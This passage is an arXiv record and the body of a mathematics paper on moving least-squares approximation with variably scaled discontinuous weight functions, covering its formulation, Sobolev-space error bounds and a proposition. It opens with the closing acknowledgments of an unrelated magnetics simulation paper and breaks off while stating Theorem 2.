of growth, control experiment and reversal. **Video 4** Video showing flatspin simulation of the bipolar clock protocol series. Each frame depicts the clock pulse preceding it. The series consists of growth, control experiment and reversal. ## Acknowledgments These experiments were performed at the CIRCE beamline at ALBA Synchrotron with the collaboration of ALBA staff. This work was funded in part by the Norwegian Research Council through the IKTPLUSS project SOCRATES (Grant no. 270961) and the TEKNOKONVERGENS project SPrINTER (Grant No. 331821), and in part by the EU FET-Open RIA project SpinENGINE (Grant No. 861618). The Research Council of Norway is acknowledged for the support to the Norwegian Micro- and Nano-Fabrication Facility, NorFab, project number 295864. Simulations were executed on the NTNU EPIC compute cluster[38]. MAN, MF and MWK acknowledge funding from MCIN through grant number PID2021-122980OB-C54 and MWK also acknowledges support through Marie Sklodowska-Curie grant agreement No. 754397 (DOC-FAM) from EU Horizon 2020.
2302.02707
Moving Least Squares Approximation using Variably Scaled Discontinuous Weight Function
Functions with discontinuities appear in many applications such as image reconstruction, signal processing, optimal control problems, interface problems, engineering applications and so on. Accurate approximation and interpolation of these functions are therefore of great importance. In this paper, we design a moving least-squares approach for scattered data approximation that incorporates the discontinuities in the weight functions. The idea is to control the influence of the data sites on the approximant, not only with regards to their distance from the evaluation point, but also with respect to the discontinuity of the underlying function. We also provide an error estimate on a suitable {\it piecewise} Sobolev Space. The numerical experiments are in compliance with the convergence rate derived theoretically.
Mohammad Karimnejad Esfahani, Stefano De Marchi, Francesco Marchetti
2023-02-06T11:20:31Z
http://arxiv.org/abs/2302.02707v1
# Moving Least Squares Approximation using Variably Scaled Discontinuous Weight Function ###### Abstract Functions with discontinuities appear in many applications such as image reconstruction, signal processing, optimal control problems, interface problems, engineering applications and so on. Accurate approximation and interpolation of these functions are therefore of great importance. In this paper, we design a moving least-squares approach for scattered data approximation that incorporates the discontinuities in the weight functions. The idea is to control the influence of the data sites on the approximant, not only with regards to their distance from the evaluation point, but also with respect to the discontinuity of the underlying function. We also provide an error estimate on a suitable _piecewise_ Sobolev Space. The numerical experiments are in compliance with the convergence rate derived theoretically. ## 1 Introduction In practical applications, over a wide range of studies such as surface reconstruction, numerical solution of differential equations and kernel learning [1, 2, 3], one has to solve the problem of reconstructing an unknown function \(f:\Omega\longrightarrow\mathbb{R}\) sampled at some finite set of data sites \(X=\{\mathbf{x}_{i}\}_{1\leq i\leq N}\subset\Omega\subset\mathbb{R}^{d}\) with corresponding data values \(f_{i}=f(\mathbf{x}_{i}),\ 1\leq i\leq N\). Since in practice the function values \(f_{i}\) are sampled at scattered points, and not on a uniform grid, Meshless (or meshfree) Methods (MMs) are used as an alternative to mesh-based numerical approaches, such as the Finite Element Method (FEM) and Finite Differences (FD). The idea of MMs can be traced back to [4]. Afterwards, multivariate MMs existed under many names and were used in different contexts; interested readers are referred to [5] for an overview of MMs. In a general setting, MMs are designed, at least partly, to avoid the use of an underlying mesh or triangulation. The approximant of \(f\) at \(X\) can be expressed in the form \[s_{f,X}(\mathbf{x})=\sum_{i=1}^{N}\alpha_{i}(\mathbf{x})f_{i}. \tag{1}\] One might seek a function \(s_{f,X}\) that interpolates the data, i.e. \(s_{f,X}(\mathbf{x}_{i})=f_{i},\ 1\leq i\leq N\), and in this case the \(\alpha_{i}(\mathbf{x})\) will be the _cardinal functions_. However, one might consider a more general framework known as _quasi-interpolation_, in which \(s_{f,X}\) only approximates the data, i.e., \(s_{f,X}(\mathbf{x}_{i})\approx f_{i}\). The latter case means that we prefer to let the approximant \(s_{f,X}\) only nearly fit the function values. This is useful, for instance, when the given data contain some noise, or the number of data is too large. The standard approach to deal with such a problem is to compute the Least-Squares (LS) solution, i.e., one minimizes the error (or cost) function \[\sum_{i=1}^{N}[s_{f,X}(\mathbf{x}_{i})-f_{i}]^{2}. \tag{2}\] A more general setting is the weighted LS, in which (2) turns into \[\sum_{i=1}^{N}[s_{f,X}(\mathbf{x}_{i})-f_{i}]^{2}w(\mathbf{x}_{i}), \tag{3}\] which is ruled by the _weighted_ discrete \(\ell_{2}\) inner product. In practice, the weights \(w(\mathbf{x}_{i})\) add flexibility to the LS formulation by controlling how strongly each datum \(f_{i}\) influences the approximation process, for example when some of the data are affected by noise.
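Before moving to the localized variant, it may help to see the weighted least-squares problem (3) in code. The following minimal sketch (hypothetical names, NumPy, a one-dimensional polynomial space, solved via the weighted normal equations) is only an illustration and not code from the paper.

```python
import numpy as np

def weighted_ls_fit(x, f, w, degree=2):
    """Global weighted least squares: minimize sum_i w(x_i) * (s(x_i) - f_i)^2
    over polynomials of the given degree; returns the fitted polynomial s."""
    P = np.vander(x, degree + 1, increasing=True)          # columns 1, x, x^2, ...
    W = np.diag(w)
    c = np.linalg.solve(P.T @ W @ P, P.T @ W @ f)          # weighted normal equations
    return lambda t: np.vander(np.atleast_1d(t), degree + 1, increasing=True) @ c

# noisy samples, down-weighting the noisier right half of the interval
rng = np.random.default_rng(0)
x = np.linspace(0.0, 1.0, 40)
f = np.sin(2.0 * np.pi * x) + rng.normal(0.0, 0.05, x.size)
w = np.where(x < 0.5, 1.0, 0.25)
s = weighted_ls_fit(x, f, w, degree=5)
```

Every data site enters this fit with one fixed weight; the moving variant described next re-weights the sites around each evaluation point instead.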
However, these methods are global in the sense that all data sites have influence on the solution at any evaluation point \(\mathbf{x}\in\Omega\). Alternatively, for a fixed evaluation point \(\mathbf{x}\), one can consider only \(n\)-th closest data sites \(\mathbf{x}_{i},\,i=1,\ldots,n\) of \(\mathbf{x}\) such that \(n\ll N\). The _Moving Least-Squares_ (MLS) method, which is a _local_ variation of the classical weighted least-squares technique, has been developed following this idea. To be more precise, in the MLS scheme, for each evaluation point \(\mathbf{x}\) one needs to solve a _weighted least-squares_ problem, minimizing \[\sum_{i=1}^{N}[s_{f,X}(\mathbf{x}_{i})-f_{i}]^{2}w(\mathbf{x},\mathbf{x}_{i}) \tag{4}\] by choosing the weight functions \(w(\mathbf{x},\mathbf{x}_{i}):\mathbb{R}^{d}\times\mathbb{R}^{d}\longrightarrow \mathbb{R}\) to be localized around \(\mathbf{x}\), so that _few_ data sites are taken into account. The key difference with respect to (3) is that the weight function is indeed _moving_ with the evaluation point, meaning that it depends on both the \(\mathbf{x}_{i}\) and \(\mathbf{x}\). Consequently, for each evaluation point \(\mathbf{x}\), a small linear system needs to be solved. Also, one can let \(w(\cdot,\mathbf{x}_{i})\) be a radial function i.e., \(w(\mathbf{x},\mathbf{x}_{i})=\varphi(\|\mathbf{x}-\mathbf{x}_{i}\|_{2})\) for some non-negative univariate function \(\varphi:[0,\infty)\longrightarrow\mathbb{R}\). Doing in this way, \(w(\cdot,\mathbf{x}_{i})\) inherits the translation invariance property of radial basis functions. We mention that (4) could be generalized as well by letting \(w_{i}(\cdot)=w(\cdot,\mathbf{x}_{i})\) moves with respect to a _reference_ point \(\mathbf{y}\) such that \(\mathbf{y}\neq\mathbf{x}\). The earliest idea of MLS approximation technique can be traced back to Shepard's seminal paper [6], in which the author considered the approximation by constants. Later on, the general framework of MLS was introduced by Lancaster and Salkauskas in [7], where they presented the analysis of MLS methods for smoothing and interpolation of scattered data. Afterwards, in [8] the author analyzed the connection between MLS and the Backus-Gilbert approach [9], and showed that the method is effective for derivatives approximations as well. Since then, MLS method showed its effectiveness in different applications [10, 11]. The error analysis of MLS approximation has been provided by some authors, mainly based on the work of Levin [12]. In [13, Chap. 3 & 4] and [14] the author suggested error bounds that take into account the so-called _fill-distance_, whose definition is recalled in Subsection 2.1. Other works focusing on the theoretical aspects of MLS method include [15], in which the authors provided error estimates in \(L_{\infty}\) for the function and its first derivatives in the one dimensional case, then [16], where they generalized this approach to the multi-dimensional case. In both these works, the error analysis is based on the _support_ of the weight functions and not on the fill distance. More recently, in [17] the author obtained an error estimate for MLS approximation of functions that belong to integer or fractional-order Sobolev spaces, which shows similarities to the bound previously studied in [18] for kernel-based interpolation. The MLS method has rarely been used for approximating piecewise-continuous functions, i.e, functions that possess some discontinuities or jumps. 
In this case, it would be essential that the approximant takes into account the location of the discontinuities. To this end, in this paper we let the weight function be a _Variably Scaled Discontinuous Kernel_ (VSDK) [19]. VSDK interpolant have been employed to mitigate the Gibbs phenomenon, outperforming classical kernel-based interpolation in [21]. Similarly in MLS approximation framework, the usage of VSDK weights allows the construction of data-dependent approximants (as discussed in [12, SS4]) that are able to overcome the performances of classical MLS approximants, as indicated by a careful theoretical analysis and then assessed by various numerical experiments. The paper is organized as follows. In Section 2 we recall necessary notions of the MLS, VSDKs and Sobolev spaces. Section 3 presents the original contribution of this work, consisting in the use of variably scaled discontinuous weights for reconstructing discontinuous functions in the framework of MLS approximation. The error analysis shows that the MLS-VSDKs approximation can outperform classical MLS schemes as the discontinuities of the underlying function are assimilated into the weight function. In Section 4 we discuss some numerical experiments that support our theoretical findings, and in Section 5 we draw some conclusions. ## 2 Preliminaries on MLS and VKs ### Moving Least Squares (MLS) approximation In this introduction to MLS, we resume and deepen what outlined in the previous section. The interested readers are also refereed to [22, Chap. 22]. Let \(\Omega\) be a non-empty and bounded domain in \(\mathbb{R}^{d}\) and \(X\) be the set of \(N\) distinct data sites (or centers). We consider the target function \(f\), and the corresponding function values \(f_{i}\) as defined above. Moreover, \(\mathcal{P}^{d}_{\ell}\) indicates the space of \(d\)-variate polynomials of degree at most \(\ell\in\mathbb{N}\), with basis \(\{p_{1},...,p_{Q}\}\) and dimension \(Q=\binom{\ell+d}{d}\). Several equivalent formulations exist for the MLS approximation scheme. As the standard formulation, the MLS approximant looks for the best weighted approximation to \(f\) at the evaluation point \(\mathbf{x}\) in \(\mathcal{P}^{d}_{\ell}\) (or any other linear space of functions \(\mathcal{U}\)), with respect to the discrete \(\ell_{2}\) norm induced by the weighted inner product \(\langle f,g\rangle_{w_{\mathbf{x}}}=\sum_{i=1}^{N}w(\mathbf{x}_{i},\mathbf{x} )f(\mathbf{x}_{i})g(\mathbf{x}_{i})\). Mathematically speaking, the MLS approximant will be the linear combination of the poly nomial basis i.e., \[s_{f,X}(\mathbf{x})=\sum_{j=1}^{Q}c_{j}(\mathbf{x})p_{j}(\mathbf{x}), \tag{5}\] where the coefficients are obtained by locally minimizing the weighted least square error in (4), which is equivalent to minimizing \(\|f-s_{f}\|_{w_{\mathbf{x}}}\). We highlight that the local nature of the approximant is evident from the fact that the coefficient \(c_{j}(\mathbf{x})\) must be computed for each evaluation point \(\mathbf{x}\). In another formulation of MLS approximation known as the _Backus-Gilbert_ approach, one considers the approximant \(s_{f,X}(\mathbf{x})\) to be a _quasi interpolant_ of the form (1). 
In this case, one seeks the values of the basis functions \(\alpha_{i}(\mathbf{x})\) (also known as generating or shape functions) as the minimizers of \[\frac{1}{2}\sum_{i=1}^{N}\alpha_{i}^{2}(\mathbf{x})\frac{1}{w(\mathbf{x}_{i}, \mathbf{x})} \tag{6}\] subject to the polynomial reproduction constraints \[\sum_{i=1}^{N}p(\mathbf{x}_{i})\alpha_{i}(\mathbf{x})=p(\mathbf{x}),\quad \text{for all }p\in\mathcal{P}_{\ell}^{d}.\] Such a constrained quadratic minimization problem can be converted to a system of linear equations by introducing Lagrange multipliers \(\boldsymbol{\lambda}(\mathbf{x})=[\lambda_{1}(\mathbf{x}),...,\lambda_{Q}( \mathbf{x})]^{T}\). Consequently (e.g see [13, Corollary 4.4]), the MLS basis function \(\alpha_{i}\) evaluated at \(\mathbf{x}\) is given by \[\alpha_{i}(\mathbf{x})=w(\mathbf{x},\mathbf{x}_{i})\sum_{k=1}^{Q}\lambda_{k}( \mathbf{x})p_{k}(\mathbf{x}_{i}),\quad 1\leq i\leq N, \tag{7}\] such that \(\lambda_{k}(\mathbf{x})\) are the unique solution of \[\sum_{k=1}^{Q}\lambda_{k}(\mathbf{x})\sum_{i=1}^{N}w(\mathbf{x},\mathbf{x}_{i })p_{k}(\mathbf{x}_{i})p_{s}(\mathbf{x}_{i})=p_{s}(\mathbf{x}),\quad 1\leq s \leq Q. \tag{8}\] We observe that the weight function \(w_{i}(\mathbf{x})=w(\mathbf{x},\mathbf{x}_{i})\) controls the influence of the center \(\mathbf{x}_{i}\) over the approximant, so it should be _small_ when evaluated at a point that is far from \(\mathbf{x}\), that is it should decay to zero fast enough. To this end we may let \(w_{i}(\mathbf{x})\) be positive on a ball centered at \(\mathbf{x}\) with radius \(r\), \(B(\mathbf{x},r)\), and zero outside. For example, a compactly supported radial kernel satisfies such a behaviour. Thus, let \(I(\mathbf{x})=\{i\in\{1,\ldots,N\},\|\mathbf{x}-\mathbf{x}_{i}\|_{2}{\leq r}\}\) be the family of indices of the centers \(X\), for which \(w_{i}(\mathbf{x})>0\), with \(|I|=n\ll N\). Only the centers \(\mathbf{x}_{i}\in I\) influence the approximant \(s_{f,X}(\mathbf{x})\). Consequently, the matrix representation of (7) and (8) is \[\boldsymbol{\alpha}(\mathbf{x}) =W(\mathbf{x})P^{T}\boldsymbol{\lambda}(\mathbf{x}),\] \[\boldsymbol{\lambda}(\mathbf{x}) =(PW(\mathbf{x})P^{T})^{-1}\mathbf{p}(\mathbf{x}),\] where \(\mathbf{\alpha}(\mathbf{x})=[\alpha_{1}(\mathbf{x}),...,\alpha_{n}(\mathbf{x})]^{T}\), \(W(\mathbf{x})\in\mathbb{R}^{n\times n}\) is the diagonal matrix carrying the weights \(w_{i}(\mathbf{x})\) on its diagonal, \(P\in\mathbb{R}^{Q\times n}\) such that its \(k\)-th row contains \(p_{k}\) evaluated at data sites in \(I(\mathbf{x})\), and \(\mathbf{p}(\mathbf{x})=[p_{1}(\mathbf{x}),...,p_{Q}(\mathbf{x})]^{T}\). More explicitly the basis functions are given by \[\mathbf{\alpha}(\mathbf{x})=W(\mathbf{x})P^{T}(PW(\mathbf{x})P^{T})^{-1}\mathbf{ p}(\mathbf{x}). \tag{9}\] Moreover, it turns out that the solution of (5) is identical to the solution offered by the Backus-Gilbert approach (see e.g. [13, Chap. 3 & 4]). In the MLS literature, it is known that a local polynomial basis shifted to the evaluation point \(\mathbf{x}\in\Omega\) leads to a more stable method (see e.g. [13, Chap. 4]). Accordingly, we let the polynomial basis to be \(\{1,(\cdot-\mathbf{x}),\ldots,(\cdot-\mathbf{x})^{\ell}\}\), meaning that different bases for each evaluation point are employed. In this case, since with standard monomials basis we have \(p_{1}\equiv 1\) and \(p_{k}(0)=0\) for \(2\leq k\leq Q\), then \(\mathbf{p}(\mathbf{x})=[1,0,...,0]^{T}\). 
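Equations (8)-(9), with the basis shifted to the evaluation point so that \(\mathbf{p}(\mathbf{x})=[1,0,\ldots,0]^{T}\), translate almost line by line into code. The sketch below (one-dimensional, linear polynomials, a compactly supported Wendland-type weight, hypothetical names) is meant only to make the construction concrete, not to reproduce the authors' implementation.

```python
import numpy as np

def wendland_c2(r):
    """Compactly supported C^2 Wendland-type weight, positive on [0, 1)."""
    return np.where(r < 1.0, (1.0 - r)**4 * (4.0 * r + 1.0), 0.0)

def mls_shape_functions(x, centers, eps, degree=1):
    """Shape functions alpha(x) = W P^T (P W P^T)^{-1} p(x) at one point x,
    using the polynomial basis shifted to x, i.e. p(x) = e_1 (cf. (8)-(9))."""
    w = wendland_c2(eps * np.abs(centers - x))
    idx = np.nonzero(w > 0.0)[0]                  # only nearby centers contribute
    # k-th row of P holds the k-th shifted basis function at the active centers
    P = np.vander(centers[idx] - x, degree + 1, increasing=True).T
    W = np.diag(w[idx])
    e1 = np.zeros(degree + 1); e1[0] = 1.0
    lam = np.linalg.solve(P @ W @ P.T, e1)        # Lagrange multipliers of (8)
    return idx, W @ P.T @ lam                     # alpha_i(x) of (9)

def mls_approximant(x, centers, values, eps, degree=1):
    """Evaluate s_{f,X}(x) = sum_i alpha_i(x) f_i."""
    idx, alpha = mls_shape_functions(x, centers, eps, degree)
    return float(alpha @ values[idx])
```

The linear system is only \(Q\times Q\) (here \(Q=2\)), and only the centers with a positive weight enter it, which is what keeps the cost per evaluation point low.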
To ensure the invertibility of \(PW(\mathbf{x})P^{T}\) in (9), \(X\) needs to be \(\mathbb{P}_{\ell}^{d}\)-unisolvent. Then as long as \(w_{i}(\mathbf{x})\) is positive, \(PW(\mathbf{x})P^{T}\) will be a positive definite matrix, and so invertible; more details are available in [22, Chap. 22]. Furthermore, thanks to equation (7), it is observable that the behaviour of \(\alpha_{i}(\mathbf{x})\) is heavily influenced by the behaviour of the weight functions \(w_{i}(\mathbf{x})\), in particular it includes continuity and the support of the basis functions \(\alpha_{i}(\mathbf{x})\). Another significant feature is that the weight functions \(w_{i}(\mathbf{x})\) which are singular at the data sites lead to cardinal basis functions i.e., \(\alpha_{i}(\mathbf{x}_{j})=\delta_{i,j}\;i,j=1,...,n\), meaning that MLS scheme interpolates the data (for more details see [12, Theorem 3]). We also recall the following definitions that we will use for the error analysis. 1. A set \(\Omega\subset\mathbb{R}^{d}\) is said to satisfy an **interior cone condition** if there exists an angle \(\Theta\in(0,\pi/2)\) and a radius \(r>0\) so that for every \(\mathbf{x}\in\Omega\) a unit vector \(\xi(\mathbf{x})\) exists such that the cone \[C(\mathbf{x},\xi,\Theta,r)=\{\mathbf{x}+t\mathbf{y}:\mathbf{y}\in\mathbb{R}^{ d},\|\mathbf{y}\|_{2}=1,\cos(\Theta)\leq\mathbf{y}^{T}\xi,t\in[0,r]\}\] is contained in \(\Omega\). 2. A set \(X=\{\mathbf{x}_{1},...,\mathbf{x}_{N}\}\) with \(Q\leq N\) is called \(\mathbb{P}_{\ell}^{d}\)-unisolvent if the zero polynomial is the only polynomial from \(\mathbb{P}_{\ell}^{d}\) that vanishes on \(X\). 3. The **fill distance** is defined as \[h_{X,\Omega}=\sup_{\mathbf{x}\in\Omega}\min_{1\leq j\leq N}\|\mathbf{x}- \mathbf{x}_{j}\|_{2}.\] 4. The **separation distance** \[q_{X}=\frac{1}{2}\underset{i\neq j}{\min}\|\mathbf{x}_{i}-\mathbf{x}_{j}\|.\] 5. The set of data sites \(X\) is said to be **quasi-uniform** with respect to a constant \(c_{qu}>0\) if \[q_{X}\leq h_{X,\Omega}\leq c_{qu}q_{X}.\] ### Sobolev spaces and error estimates for MLS Assume \(k\in\mathbb{N}_{0}\) and \(p\in[1,\infty)\), then the _integer-order_ Sobolev space \(W^{k}_{p}(\Omega)\) consists of all \(u\) with distributional (weak) derivatives \(D^{\boldsymbol{\delta}}u\in L^{p},|\boldsymbol{\delta}|\leq k\). The semi-norm and the norm associated with these spaces are \[|u|_{w^{k}_{p}(\Omega)}{:=}\Big{(}\sum_{|\boldsymbol{\delta}|=k}\|D^{ \boldsymbol{\delta}}u\|_{L^{p}(\Omega)}^{p}\Big{)}^{1/p}\ \,,\qquad\|u\|_{w^{k}_{p}(\Omega)}{:=}\Big{(}\sum_{| \boldsymbol{\delta}|\leq k}\|D^{\boldsymbol{\delta}}u\|_{L^{p}(\Omega)}^{p} \Big{)}^{1/p}. 
\tag{10}\] Moreover, letting \(0<s<1\), the _fractional-order_ Sobolev space \(W^{k+s}_{p}(\Omega)\) is the space of the functions \(u\) for which semi-norm and norm are defined as \[|u|_{W^{k+s}_{p}(\Omega)}:=\Big{(}\sum_{|\boldsymbol{\delta}|=k}\int_{\Omega}\int_{\Omega}\frac{|D^{\boldsymbol{\delta}}u(\mathbf{x})-D^{\boldsymbol{\delta}}u(\mathbf{y})|^{p}}{|\mathbf{x}-\mathbf{y}|^{d+ps}}\,d\mathbf{x}\,d\mathbf{y}\Big{)}^{1/p},\] \[\|u\|_{W^{k+s}_{p}(\Omega)}:=\Big{(}\|u\|_{W^{k}_{p}(\Omega)}^{p}+|u|_{W^{k+s}_{p}(\Omega)}^{p}\Big{)}^{1/p}.\] Consider Sobolev spaces \(W^{k}_{p}(\Omega)\) with \(1<p<\infty\) and \(k>m+d/p\) (for \(p=1\) equality is also allowed). Then, according to [18, Theorem 2.12], the sampling inequality \[\|u\|_{W^{m}_{p}(\Omega)}\leq Ch^{k-m-d(1/p-1/p)_{+}}_{X,\Omega}\|u\|_{W^{k}_{p}(\Omega)}\] holds for a function \(u\) that satisfies \(u(X)=0\), with \(h_{X,\Omega}\) being the _fill distance_ associated with \(X\) and \((\mathbf{y})_{+}=\max\left\{0,\mathbf{y}\right\}\). For more information regarding Sobolev spaces and sampling inequalities we refer the reader to [23] and [24], respectively. Getting back to the MLS scheme, let \(D^{\boldsymbol{\delta}}\) be a derivative operator such that \(|\boldsymbol{\delta}|\leq\ell\) (we recall that \(\ell\) is the maximum degree of the polynomials). Under some mild conditions regarding the weight functions, [17, Theorem 3.11] shows that \(\{D^{\boldsymbol{\delta}}\alpha_{i}(\mathbf{x})\}_{1\leq i\leq n}\) forms a _local polynomial reproduction_, in the sense that there exist constants \(h_{0},\ C_{1,\boldsymbol{\delta}},\ C_{2}\) such that for every evaluation point \(\mathbf{x}\) * \(\sum_{i=1}^{N}D^{\boldsymbol{\delta}}\alpha_{i}(\mathbf{x})p(\mathbf{x}_{i})=p(\mathbf{x})\) for all \(p\in\mathbb{P}^{d}_{\ell}\), * \(\sum_{i=1}^{N}|D^{\boldsymbol{\delta}}\alpha_{i}(\mathbf{x})|\leq C_{1,\boldsymbol{\delta}}h^{-|\boldsymbol{\delta}|}_{X,\Omega}\), * \(D^{\boldsymbol{\delta}}\alpha_{i}(\mathbf{x})=0\) provided that \(\|\mathbf{x}-\mathbf{x}_{i}\|_{2}\geqslant C_{2}h_{X,\Omega}\), for all \(X\) with \(h_{X,\Omega}\leq h_{0}\). The particular case \(|\boldsymbol{\delta}|=0\) was previously discussed in [13, Theorem 4.7], in which it is shown that \(\{\alpha_{i}(\mathbf{x})\}_{1\leq i\leq n}\) forms a local polynomial reproduction. In this case, however, the basis functions \(\{\alpha_{i}(\cdot)\}_{1\leq i\leq n}\) may even be discontinuous, but it is necessary that the \(w_{i}(\mathbf{x})\) are bounded (for more details see [13, Chap. 3 & 4]). Consequently we restate the MLS error bound in Sobolev spaces developed in [17]. **Theorem 1**.: _[17, Theorem 3.12] Suppose that \(\Omega\subset\mathbb{R}^{d}\) is a bounded set with a Lipschitz boundary. Let \(\ell\) be a positive integer, \(0\leq s<1\), \(p\in[1,\infty)\), \(q\in[1,\infty]\), and let \(\boldsymbol{\delta}\) be a multi-index satisfying \(\ell>|\boldsymbol{\delta}|+d/p\) for \(p>1\) and \(\ell\geqslant|\boldsymbol{\delta}|+d\) for \(p=1\). If \(f\in W^{\ell+s}_{p}(\Omega)\), there exist constants \(C>0\) and \(h_{0}>0\) such that for all \(X=\{\mathbf{x}_{1},...,\mathbf{x}_{N}\}\subset\Omega\) which are quasi-uniform with \(h_{X,\Omega}\leq\min\{h_{0},1\}\), the error estimate holds_ \[\|f-s_{f,X}\|_{W^{|\mathbf{\delta}|}_{q}(\Omega)}\leq Ch_{X,\Omega}^{\ell+s-|\mathbf{\delta}|-d(1/p-1/q)_{+}}\|f\|_{W^{\ell+s}_{p}(\Omega)}.
\tag{11}\] _when the polynomial basis, are shifted to the evaluation point \({\bf x}\) and scaled with respect to the fill distance \(h_{X,\Omega}\), and \(w_{i}(\cdot)\) is positive on \([0,1/2]\), supported in \([0,1]\) such that its even extension is non negative and continuous on \(\mathbb{R}\)._ **Remark 1**.: _The above error bounds holds also when \(s=1\). However, recalling the definition of (semi-)norms in fractional-order Sobolev space, we see that in this case we reach to an integer-order Sobolev space of \(\ell+1\). Therefore, it requires that \(\ell+1>|\mathbf{\delta}|+d/p\) for \(p>1\) or \(\ell+1\geqslant|\mathbf{\delta}|\) for \(p=1\) in order that (11) holds true. The key point is that in this case, the polynomial space is still \(\mathcal{P}^{d}_{\ell}\) and not \(\mathcal{P}^{d}_{\ell+1}\)._ ### Variably Scaled Discontinuous Kernels (VSDKs) Variably Scaled Kernels (VSKs) were firstly introduced in [20]. The basic idea behind them is to map the data sites from \(\mathbb{R}^{d}\) to \(\mathbb{R}^{d+1}\) via a scaling function \(\psi:\Omega\longrightarrow\mathbb{R}\) and to construct an augmented approximation space in which the data sites are \(\{({\bf x}_{i},\psi({\bf x}_{i}))\;i=1,...,N\}\) (see [20, Def. 2.1]). Though the first goal of doing so was getting a _better_ nodes distribution in the augmented dimension, later on in [19] the authors came up with the idea of also encoding the behaviour of the underlying function \(f\) inside the scale function \(\psi\). Precisely, for the target function \(f\) that possesses some jumps, the key idea is the following. **Definition 1**.: _Let \(\mathcal{P}=\{\Omega_{1},...,\Omega_{n}\}\) be a partition of \(\Omega\) and let \(\mathbf{\beta}=(\beta_{1},...,\beta_{n})\) be a vector of real distinct values. Moreover, assume that all the jump discontinuities of the underlying function \(f\) lie on \(\bigcup_{j=1}^{n}\partial\Omega_{j}\). The piecewise constant scaling function \(\psi_{\mathcal{P},\mathbf{\beta}}\) with respect to the partition \(\mathcal{P}\) and the vector \(\mathbf{\beta}\) is defined as_ \[\psi_{\mathcal{P},\mathbf{\beta}}({\bf x})|_{\Omega_{j}}=\beta_{j},\;{\bf x}\in\Omega.\] _Successively, let \(\Phi^{\varepsilon}\) be a positive definite radial kernel on \(\Omega\times\Omega\) that depends on the shape parameter \(\varepsilon>0\). A variably scaled discontinuous kernel on \((\Omega\times\mathbb{R})\times(\Omega\times\mathbb{R})\) is defined as_ \[\Phi^{\varepsilon}_{\psi}({\bf x},{\bf y})=\Phi^{\varepsilon}\big{(}\Psi({\bf x }),\Psi({\bf y})\big{)},\quad{\bf x},{\bf y}\in\Omega. \tag{12}\] _such that \(\Psi({\bf x})=({\bf x},\psi({\bf x}))\)._ Moreover, we point out that if \(\Phi^{\varepsilon}\) is (strictly) positive definite then so is \(\Phi^{\varepsilon}_{\psi}\), and if \(\Phi^{\varepsilon}\) and \(\psi\) are continuous then so is \(\Phi^{\varepsilon}_{\psi}\)[20, Theorem 2.2]. Figure 1 shows two different choices for the discontinuous scale function for the univariate case. In any case, it matters that the discontinuities of the target function \(f\) are assimilated into the kernel \(\Phi^{\varepsilon}_{\Psi}\). ## 3 MLS-VSDKs Let \(f\) be a function with some jump discontinuities defined on \(\Omega\), \(\mathcal{P}\) and \(\psi_{\mathcal{P},\beta}\) as in Definition 1. We look for the MLS approximant with _variably scaled discontinuous weight function_ such that \[w_{\psi}(\mathbf{x},\mathbf{x}_{i})=w(\Psi(\mathbf{x}),\Psi(\mathbf{x}_{i})). 
\tag{13}\] Above all, we point out that in this case the diagonal matrix \(W(\mathbf{x})\) in (9) still carries only positive values by assumption, and therefore the equation (9) is still solvable meaning that the basis functions \(\alpha(\mathbf{x})\) uniquely exist. However, with new weight functions, from (13) also \(\alpha(\mathbf{x})\) might be continuous or discontinuous regarding to the given data values \(f_{i}\). Therefore our basis functions are indeed data-dependent thanks to (13). From now on, we call this scheme MLS-VSDK, and we will denote the corresponding approximant as \(s^{\psi}_{f,X}\). Since the basis functions are data dependent, one might expect that the space in which we express the error bound should be data dependent as well. Towards this idea, for \(k\in\mathbb{Z},\ 0\leq k\), and \(1\leq p\leq\infty\), we define the _piecewise_ Sobolev Spaces \[\mathcal{W}^{k}_{p}(\Omega)=\{f:\Omega\longrightarrow\mathbb{R}\ \text{s.t.}\ f_{|_{\Omega_{j}}}\in W^{k}_{p}(\Omega_{j}),\quad j\in\{1,...,n \}\},\] where \(f_{|_{\Omega_{j}}}\) denotes the restriction of \(f\) to \(\Omega_{j}\), and \(W^{k}_{p}(\Omega_{j})\) denote the Sobolev space on \(\Omega_{i}\). We endow \(\mathcal{W}^{k}_{p}(\Omega)\) with the norm \[\|f\|_{\mathcal{W}^{k}_{p}(\Omega)}{=\sum_{j=1}^{n}}\|f\|_{W^{k}_{p}(\Omega_{ j})}. \tag{14}\] When \(k=0\) we simply denote \(\mathcal{W}^{0}_{p}(\Omega)\) by \(\mathcal{L}^{p}(\Omega)\). Moreover, it could be shown that for any partition of \(\Omega\) the standard Sobolev space \(W^{k}_{p}(\Omega)\) is contained in \(\mathcal{W}^{k}_{p}(\Omega)\) (see [21] and reference therein). We assume that every set \(\Omega_{j}\in\mathcal{P}\) satisfies Lipschitz boundary conditions which will be essential for our error analysis. **Proposition 1**.: _Let \(\mathcal{P}\) be as in Definition 1 and set the derivative order \(\boldsymbol{\delta}=0\). Then, by using Theorem (1), the error satisfies the inequality_ \[\|f-s^{\psi}_{f,X}\|_{L^{2}(\Omega_{j})}{\leq C_{j}h^{\ell+1-d(1/p-1/2)_{+}}_{ \Omega_{j}}\|f\|_{W^{\ell+1}_{p}(\Omega_{j})}},\qquad\text{for all}\ \,\Omega_{j}\in\mathcal{P} \tag{15}\] Figure 1: Discontinuous scale functions. _with \(h_{\Omega_{j}}\) the fill distance with respect to \(\Omega_{j}\)._ Proof.: Recalling Definition 1 we know that the discontinuities of \(f\) and subsequently \(w_{i}(\cdot)\) are located only at the boundary and not on the domain \(\Omega_{j}\), meaning that \(w_{i}(\cdot)\) is continuous inside \(\Omega_{j}\). Furthermore, the basis \(\{\alpha_{i}(\mathbf{x})\}_{1\leq i\leq n}\) forms a local polynomial reproduction i.e., there exists a constant \(C\) such that \(\sum_{i=1}^{N}\lvert\alpha_{i}\rvert\leq C\). Letting \(s=1\) and \(q=2\), by noticing that \(W^{0}_{q}(\Omega_{j})=L^{q}(\Omega_{j})\), then the error bound (15) is an immediate consequence of Theorem (1). From the above proposition, it could be understood that \(s^{\psi}_{f,X}\) behaves similarly to \(s_{f,X}\) in the domain \(\Omega_{j}\), where there is no discontinuity. This is in agreement with Definition 1. Consequently, it is required to extend the error bound (15) to the whole domain \(\Omega\). **Theorem 2**.: _Let \(f\), \(\mathcal{P}\), \(\psi_{\mathcal{P},\beta}\) be as before, and the weight functions as in (13). 
